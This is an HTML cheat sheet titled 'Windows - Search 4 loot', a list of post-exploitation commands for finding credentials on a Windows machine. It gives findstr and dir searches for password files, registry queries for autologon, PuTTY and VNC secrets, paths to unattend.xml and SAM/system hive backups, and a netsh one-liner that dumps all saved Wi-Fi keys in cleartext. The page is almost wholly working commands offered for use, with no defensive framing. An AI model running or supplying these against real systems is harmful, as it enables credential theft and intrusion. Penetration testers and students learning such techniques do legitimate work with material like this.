<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Windows - Search 4 loot</title>
</head><body><b><u>Search for file contents</u></b><br/>
<br/>
cd C:\ &amp; findstr /SI /M "password" *.xml *.ini *.txt<br/>
findstr /si password *.xml *.ini *.txt *.config<br/>
findstr /spin "password" *.*<br/>
<br/>
<u><b>Search for a file with a certain filename</b></u><br/>
<br/>
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*<br/>
where /R C:\ user.txt<br/>
where /R C:\ *.ini<br/>
<br/>
<u><b>Search the registry for key names and passwords</b></u><br/>
<br/>
REG QUERY HKLM /F "password" /t REG_SZ /S /K<br/>
REG QUERY HKCU /F "password" /t REG_SZ /S /K<br/>
<br/>
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin<br/>
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2&gt;nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" <br/>
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters<br/>
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials<br/>
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials<br/>
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password<br/>
<br/>
reg query HKLM /f password /t REG_SZ /s<br/>
reg query HKCU /f password /t REG_SZ /s<br/>
<br/>
<b><u>Passwords in unattend.xml<br/>
<br/>
</u></b><b><u>Location of the unattend.xml files.</u></b><br/>
<br/>
C:\unattend.xml<br/>
C:\Windows\Panther\Unattend.xml<br/>
C:\Windows\Panther\Unattend\Unattend.xml<br/>
C:\Windows\system32\sysprep.inf<br/>
C:\Windows\system32\sysprep\sysprep.xml<br/>
<br/>
<b>Display the content of these files with </b><br/>
<br/>
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2&gt;nul<br/>
<br/>
<br/>
<b><u>Other files</u></b><br/>
<br/>
%SYSTEMDRIVE%\pagefile.sys<br/>
%WINDIR%\debug\NetSetup.log<br/>
%WINDIR%\repair\sam<br/>
%WINDIR%\repair\system<br/>
%WINDIR%\repair\software, %WINDIR%\repair\security<br/>
%WINDIR%\iis6.log<br/>
%WINDIR%\system32\config\AppEvent.Evt<br/>
%WINDIR%\system32\config\SecEvent.Evt<br/>
%WINDIR%\system32\config\default.sav<br/>
%WINDIR%\system32\config\security.sav<br/>
%WINDIR%\system32\config\software.sav<br/>
%WINDIR%\system32\config\system.sav<br/>
%WINDIR%\system32\CCM\logs\*.log<br/>
%USERPROFILE%\ntuser.dat<br/>
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat<br/>
%WINDIR%\System32\drivers\etc\hosts<br/>
dir c:*vnc.ini /s /b<br/>
dir c:*ultravnc.ini /s /b<br/>
<br/>
<br/>
<b><u>Wifi passwords</u></b><br/>
<br/>
<b><u>Find AP SSID</u></b><br/>
<br/>
netsh wlan show profile<br/>
<br/>
<b><u>Get Cleartext Pass</u></b><br/>
<br/>
netsh wlan show profile &lt;SSID&gt; key=clear<br/>
<br/>
<b><u>Oneliner method to extract wifi passwords from all the access point.</u></b><br/>
<br/>
cls &amp; echo. &amp; for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off &gt; nul &amp; (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" &amp; echo.) &amp; @echo on<br/>
<br/>
<br/>
</body></html>